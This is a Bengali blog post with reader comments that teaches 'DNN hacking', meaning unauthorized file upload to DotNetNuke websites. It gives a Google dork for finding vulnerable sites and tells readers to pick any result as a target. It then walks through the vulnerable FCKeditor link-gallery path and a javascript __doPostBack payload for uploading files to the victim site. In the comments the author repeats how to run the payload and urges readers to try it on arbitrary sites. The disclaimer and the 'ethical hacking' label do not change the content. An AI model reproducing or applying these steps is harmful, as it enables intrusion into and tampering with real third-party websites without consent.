₪₪₪₪₪ DNN হ্যাকিং ₪₪₪₪₪

24
568
₪₪₪₪₪ DNN হ্যাকিং ₪₪₪₪₪

অনির্বাচিত টিউনার™

®╔═════════════════════ஜ۩۞۩ஜ══════════════════════╗®
✪░░▒▓███►✂✂((((☠☠➸Uη§є₤є©†єd✖Ŧwєє†єЯ™➸☠☠))))✂✂◄███▓▒░░✪ ®╚═════════════════════ஜ۩۞۩ஜ══════════════════════╝®

The Ultimate Path of The Bangla Technology
অ আ ক খ প্রযুক্তি এখন আমার ভাষায়
₪₪₪₪₪ DNN হ্যাকিং ₪₪₪₪₪

আসসালামু আলাইকুম, সবাইকে আবারও আজকের হ্যাকিংয়ের টিউনে স্বাগতম। কেমন আছেন সবাই?  আশা করি সবাই মহান সৃষ্টিকর্তার অশেষ রহমতে খুবই ভাল আছেন। আজ আবারও আপনাদের সামনে হাজির হয়েছে আরেকটি হ্যাকিংয়ের টিউন নিয়ে। আজকের পর্বে আপনাদের দেখাব DNN এর মাধ্যমে একটা ওয়েবসাইট হ্যাকিং করা। খুবই মজা হবে তাই না? তাহলে চলূন মূল পর্বে….

আমরা তো হ্যাকিং করব! কিভাবে করব? DNN এর মাধ্যমে। কিন্তু আপনারা কি DNN এর পূর্ণরূপ জানেন? DNN এর পূর্ণ রূপ হল DotNetNuke. এখন হয়ত আপনাদের কাছে একটু কঠিন মনে হয়। টিউনে শেষে বলবেন যে, এটা তো এক্কেবারে সহজ। বলতে গেলে SQL-Injection ও Cross Site Scripting এর মতো। আমি আজ দেখাব আপনার টার্গেটের সাই্টটি হ্যাকিং করে ফাইল আপলোড করা। মূলতঃ DotNetNuke হল Microsoft .NET technology এর উপর তৈরি করা বিভিন্ন ওয়েবসাইট প্লাটফরম।

Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

এই টিউনের কেউ অপব্যবহার করবেন না। এটি শুধু মাত্র শিখার জন্য, কারও ক্ষতি করার উদ্দেশ্যে নয়। কেউ এই টিউনে অপব্যবহার করে কারও ক্ষতি করলে টিজে দায়ী নয়।

হ্যাকিং শুরু

  • প্রথমে Google Dorks দিয়ে একটি একটি ওয়েবসাইটকে টার্গেট করব।
inurl:”/portals/0″ site:.com 
  • এখানে দেখেন কোডটির শেষে .com দেয়া আছে। আপনি ইচ্ছা করলে আপনার ইচ্ছা মতো ডোমেইন ব্যবহার করতে পারবেন। যেমন- bd, ph, ae, net, org ইত্যাদি
  • এবার কোডটি Google এ সার্চ দিন।
  • তাহলে আপনাকে সার্চ রেজাল্টে অনেকগুলো  ওয়েবসাইটের ফলাফল দিবে।
  • এবার এখান থেকে একটিকে টার্গেট করুন। মানে একটির উপর ক্লিক করুন।
  • মনে করি আপনি এই সাই্টটিকে টার্গেট করলেন www.victim.com
  • এখন আমরা এই সাইটটির vulnerability পরীক্ষা করব।
  • এজন্য নিচের কোডটি সাইট লিংকের পরে বসিয়ে এন্টার দিন।
Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx 
  • লিংকের পরে বসালে হবে
www.victim.com/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx
  • এবার যদি নিচের ছবির মতো আসে, তাহলে বুঝবেন যে এটিকে হ্যাকিং করা যাবে।
  • এবার এখান থেকে শেষের অপশানটি নির্বাচন করুন “A File On Your Site”
  • এবার নিচের কোডটি লিংকের ঘরে লিখুন।
javascript:__doPostBack(‘ctlURL$cmdUpload’,”)
  • যদি আপনি সব কিছু পারেন, তাহলে আপনি এই সাইটে .swf .jpg .gif .pdf ফাই্ল আপলোড করতে পারবেন।
  • আপনি আপনার ফাই্ল আপলোড করার পর আপনার ফাইলের লিংক পাবেন এই রকম
www.victim.com/portals/0/yourfile.extension
  • মনে করুন আপনি b.txtফাইল আপলোড করেছেন, তাহলে হবে এই রকম।
www.victim.com/portals/0/b.txt
  • তাহলে হবে এই রকম
  • হা হা হা হা হা হা হা হা। কেমন লাগল? আশা করি এখন আপনি নিজে নিজেই পারবেন।

এখন আপনারা প্রশ্ন করতে পারবেন যে, যদি আমি নির্দিষ্ট সাই্ট হ্যাকিং করতে চাই, তাহলে কি করব?

উত্তর হবে, এটা হল Ethical Hacking টিউটোরিয়াল। এটা Black Hat হ্যাকিং টিউটোরিয়াল নয়। তাই্ আমি এভাবেই দিলাম।

সবাই্ ভাল থাকবেন, ধন্যবাদ। আল্লাহ হাফেজ……..

টিউনারপেজের নতুন টিউন আপনাকে ইমেইল করব?
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting
Unlimited Web Hosting

24 মন্তব্য

  1. ভাইজানরা আমি কি সাহস নিয়ে এগিয়ে যাবার চেষ্টা করবো ।যদি চেষ্টা করি আমাকে একেবারে প্রথম থেকে শুরু করতে হবে ।এর জন্য আমার প্রয়োজন প্রথম থেকে এই পর্যন্ত সবকটা লিংক দরকার।

  2. অনির্বাচিত টিউনার ভাই আমি জাভা স্ক্রীপ্ট টি কিভাবে রান করাবো বললে উপকৃত হতাম।

    • @ রেজা কায়সার ভাই, আপনি আপনার বেব ব্রব্সের এর অদ্দ্রেস বার এ javascript:__doPostBack(‘ctlURL$cmdUpload’,”) এই javascript কপি-পেস্ট করে করে তার পর এন্টার চাপেন।

  3. অনির্বাচিত টিউনার ভাই আপনাকে একটা অনুরোধ করব আমার একটা গেমস দরকার। গেমসটার নাম হলো Vyruz। আপনার তো কালেকশন অনেক ভালো আমাকে গেমসটা জোগাড় করে দিলে কৃতজ্ঞ থাকব। ধন্যবাদ

  4. টেকনোলজী ব্লগের সাথে বেশ অনেকদিন ধরেই আছি, বাংলাদেশে প্রতিষ্ঠিত টেকনোলজী ব্লগ গুলোতে মোটামুটি রেগুলার ই আছি, হয়তোবা কিছুই লিখিনা কিন্তু পড়ি । এতদিন ধরে থাকাতে বাংলাদেশে যারা এ বিষয়ে লেখে তাদের অনেকের ই নাম জানি। তাদের মধ্যে অনেকে বিশেষ ব্যাপারে লিখতে লিখতে বিশেষজ্ঞ হয়ে উঠেছেন।
    কিন্তু এক আপনাকে ই দেখছি এমন কোন বিষয় নাই যা নিয়ে আপনি পোষ্ট করছেন না। আমি আপনার শেষ খুজে পাচ্ছিনা। কথাটা অনেক দিন ধরেই ভাবছিলাম বলবো আজকে বলেই দিলাম। সত্যি আপনার এতসব বিষয়ে লেখার কাহিনি টা ধরতে পারছিনা। সাথে এটাও মনে প্রশ্ন জাগছে যে আপনি তো এখানে একটা ছদ্মনামে লিখছেন কিন্তু আসলে আপনি কে???????? কারণ অন্য কাওকে এতসব বিষয়ে লিখতে দেখিনি। আবার এটা ও মনে হচ্ছে এই নিকে কি শুধু আপনি ই লিখেন নাকি আপনারা লিখেন??? বর্তমানে বলা চলে আপনার পোষ্টের উপরেই টিপি অনেকটা দাড়িয়ে আছে। তাই ব্যাপারটা কেমন যেন লাগছে। আবার একটা ধারনা ও হচ্ছে কিন্তু সেটা আর বললাম না।
    আর কথাগুলো আপনার প্রতি শ্রদ্ধাবোধ থেকেই বলছি, তাই মনে কিছু করবেন না। পোষ্টের জন্য ধন্যবাদ।

    • কথা সত্য। তার লেখার উপরই টিপি দাঁড়িয়ে আছে। আর রহস্যের ব্যাপারটা রহস্যই থেকে যাক, নাকি কি বলেন ??

      • পদ্মফুল ও প্লাবন ভাই, আমার উপর টিউনার পেজে দাঁড়িয়ে কে বলেছে? আপনারা না থাকলে আমি কার জন্য লিখতাম বলেন? আর টিউনারপেজে সবাই সমান সমান। কেউ কারও থেকে উপরে নয়। এখানের এডমিন পর্যন্ত একজন সাধারণ টিজের সমান। কি বলেন? আশা করি সাথেই থাকুন।

    • podmoful ভাই্ আপনার কথাগুলো শুনে ভাল লাগল, মজা লাগল ও হাসিও পেলে।:P এটা ঠিক যে, টেকনোলজি ব্লগগুলোতে অনেকেই লেখা ও সবাই বিশেষ করে একটা নির্দিষ্ট আর্টিকেল নিয়ে লিখে থাকে। আমি আপনার সাথে মজাও করছি না। যাক, আমি শুধু মাত্র একজন। আমি “*অনির্বাচিত টিউনার*”। আমি একজনই এই পোষ্টগুলো লিখি। অনির্বাচিত টিউনার হল আমি, আমরা নই। :D আর আমি আসলে চেষ্টা করি সকল টিজে, ভিজিটরসহ সকলে সমস্যা সমাধান করতে।
      আর আপনার কথাগুলো ভাল লাগল। তবে আপনার একটা লাইন বুঝলাম না।
      আপনার বক্তব্য, “তাই ব্যাপারটা কেমন যেন লাগছে। আবার একটা ধারনা ও হচ্ছে কিন্তু সেটা আর বললাম না।”
      আপনার কেমন লাগছে? আমাকে বলেন। এখানে বলতে না চাইলে আপনি আমাকে একটা মেইল করে বলেন। আমার মেইল আ্‌ইডি হল unselectedtweeter@gmail.com
      আমাকে মেইল করে এখানে একটু কষ্ট করে বলে দিবেন। ধন্যবাদ। ভাল থাকেবন

    • জনাব পদ্মফুল ভাই, আপনি হয়তো ব্যপারটা বুঝেন নাই, আপনার দোষ নাই, ডি.টি ভাই আসলে অনেক বিষয়ে লিখে থাকেন, এর একটা বড় কারন তিনি অনেক বিষয় জানেন, যেটা আমরা অনেকেই জানি না !

      যা হোক, তিনি আসলে একজন ই ! আপনি যদি ব্যক্তিগত ভাবে তার সাথে কথা বলেন তাহলে বুজতে পারবেন যে তিনি আসলে কতটা মেধাবী একজন মানুষ ! তিনি টেকনোলজি ব্লগের অনেকগুলো মানুষের চেয়ে আলাদা, তিনি আর সবার থেকে কিছু কিছু বিষয়ে অনেক বেশি জানেন, আবার অনেক বিষয়ে হয়তো জানেন না ! তবে আর সবার থেকে সত্যি আলাদা ! তার কাছে যে কোন সমস্যার সময়াধান আমরা পাই !

      আপনাকে অনেক ধন্যবাদ !

    • আপনি Google সার্চে গিয়ে একটা Google Dork লিথে সার্চ দিন। তাহলে অনেকগুলো ফলাফল দেখাবে। এবার আপনি আপনার ইচ্ছা মতো একটি সাইটে ঢুকেন ও নিয়ম অনুসারে কাজ করে ফেলেন। ধন্যবাদ

  5. আগেই জানতাম। তবে আপনি অনেক ক্লিয়ার করে লিখেছেন। কারও বুঝতে অসুবিধা হবে না। আরো অনেকেই এই একই বিষয় নিয়ে লিখেছেন কিন্তু তাদের লেখা এতো স্পষ্ট নয়। ধন্যবাদ আপনাকে।

    • আশা করি এখন আপনারা একটু হ্যাকিং করে আমাদের দেখাবেন :P :D সবাই যাতে বুঝতে পারে, সে ভাবেই লিখতে চেষ্টা করি। সবাই ঠিক ভাবে বুঝলেই ভাল লাগে। আপনাকে ধন্যবাদ

  6. ভাই আমারে ১টা উপকার করেন আমি black hat হ্যাকার হইতে চাই ! আমি কি ভাবে বা কোথা থেকে শিখতে পারব. বললে অনেক উপকার হত.

    • ভাইজান হ্যাকিংকে খারাপ কাজে ব্যবহার যারা করে তাদেরকে black hat হ্যাকার বলে। আর আপনি যেটা বললেন, সেটা হল আপনি প্রথমে Ethical Hacking শিখুন, তারপর অন্যটা। ধন্যবাদ

  7. মাথা ঘুরায়তেসে, বাপরে কি টিউন ! আস্তে আস্তে শিখতে হবে আমার !

একটি উত্তর ত্যাগ

Please enter your comment!
Please enter your name here

three − one =